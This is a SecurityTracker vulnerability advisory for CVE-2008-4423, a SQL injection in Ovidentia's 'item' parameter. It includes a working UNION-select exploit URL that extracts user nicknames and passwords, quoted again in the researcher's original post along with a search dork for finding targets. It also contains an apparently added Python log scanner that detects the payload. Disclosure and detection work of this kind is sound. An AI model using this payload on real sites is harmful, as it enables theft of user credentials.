SecurityTracker.com

SecurityTracker
Archives
Category:   Application (Forum/Board/Portal)  >   Ovidentia
Vendors:   Cantico
Ovidentia Input Validation Flaw in 'item' Parameter Lets Remote Users Inject SQL Commands
SecurityTracker Alert ID:  1020650
SecurityTracker URL:  http://securitytracker.com/id/1020650
CVE Reference:   CVE-2008-4423
Updated:  Oct 8 2008
Original Entry Date:  Aug 12 2008
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  

Description:   A vulnerability was reported in Ovidentia. A remote user can inject SQL commands.

The software does not properly validate user-supplied input in the 'item' parameter. A remote authenticated user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

A demonstration exploit URL is provided:

http://[target]/index.php?tg=contact&idx=modify&item=-99999'+union+select+0,1,2,concat(0x6E69636B6E616D65,0x3A,nickname),concat(0x70617373776F7264,0x3A,password),5,6,7,8,9,10,11,12,13,14+from+bab_users/*

IRCRASH (R3d.W0rm (Sina Yazdanmehr)) reported this vulnerability.
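As an added defensive example (not part of this advisory or of Ovidentia's own code), the following Python scans web-server access-log lines for requests to the contact/modify page whose 'item' value is not a plain record id, and labels the UNION-based shape shown in the demonstration URL above. The log lines, the numeric-id allow-list and the field names are constructed assumptions.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (assumed Common Log Format, not taken
# from the advisory); the third carries the payload shape described above.
SAMPLE_LOG = """\
10.0.0.5 - alice [12/Aug/2008:10:01:02 +0000] "GET /index.php?tg=contact&idx=modify&item=42 HTTP/1.1" 200 512
10.0.0.5 - alice [12/Aug/2008:10:01:09 +0000] "GET /index.php?tg=contact&idx=list HTTP/1.1" 200 2048
10.0.0.9 - bob [12/Aug/2008:10:02:30 +0000] "GET /index.php?tg=contact&idx=modify&item=-99999'+union+select+0,1,2,concat(0x6E69636B6E616D65,0x3A,nickname),concat(0x70617373776F7264,0x3A,password),5,6,7,8,9,10,11,12,13,14+from+bab_users/* HTTP/1.1" 200 640
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)'
)
# Tokens that only appear when 'item' is being used to append a SELECT.
UNION_RE = re.compile(r"union\s+select|from\s+bab_users|/\*", re.IGNORECASE)


def item_is_valid(value: str) -> bool:
    """'item' is a record id, so a strict digits-only allow-list is the input
    validation the advisory says is missing (assumed policy, not vendor code)."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None


def classify_request(path: str) -> Optional[str]:
    """Return a finding label for one request path, or None if it looks benign."""
    # parse_qs decodes '+' and %XX, so the payload is inspected in decoded form.
    query = parse_qs(urlsplit(path).query, keep_blank_values=True)
    if query.get("tg") != ["contact"] or "item" not in query:
        return None
    item = query["item"][0]
    if item_is_valid(item):
        return None
    if UNION_RE.search(item):
        return "sqli-union"        # the exact shape quoted in the advisory
    return "item-not-numeric"      # any other non-id value is still worth a look


def scan_log(text: str) -> List[Tuple[str, str, str]]:
    """Return (client ip, user, label) for every flagged request in the log."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        label = classify_request(m.group("path"))
        if label:
            findings.append((m.group("ip"), m.group("user"), label))
    return findings
```

Because the advisory notes the flaw is reachable only by an authenticated user, the `user` field in each finding is the account to review, not just the source address.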

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ovidentia.org/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


Source Message Contents

Subject:  Ovidentia Sql Injection

################################################################################
####                          Ovidentia Sql Injection                            
################################################################################
#                                                                               
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               
#Our Site : Http://IRCRASH.COM                                                     
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       
################################################################################
#                                                                                  
#Script Download : www.ovidentia.org                                                
#                                                                                   
#DORK : "Powered by Ovidentia"                                                      
#                                                                                   
################################################################################
#                                      [Bug]                                        
#                                                                                   
#http://Site/index.php?tg=contact&idx=modify&item=-99999'+union+select+0,1,2,concat(0x6E69636B6E616D65,0x3A,nickname),concat(0x70617373776F7264,0x3A,password),5,6,7,8,9,10,11,12,13,14+from+bab_users/*
#                                                                                   
#                                     [Note]                                        
#                                                                                   
#You must log in as a simple user and then use the bug ;)
#                                                                                   
#################################################################################
#                           Site : Http://IRCRASH.COM                            
###################################### TNX GOD ##################################

Copyright 2021, SecurityGlobal.net LLC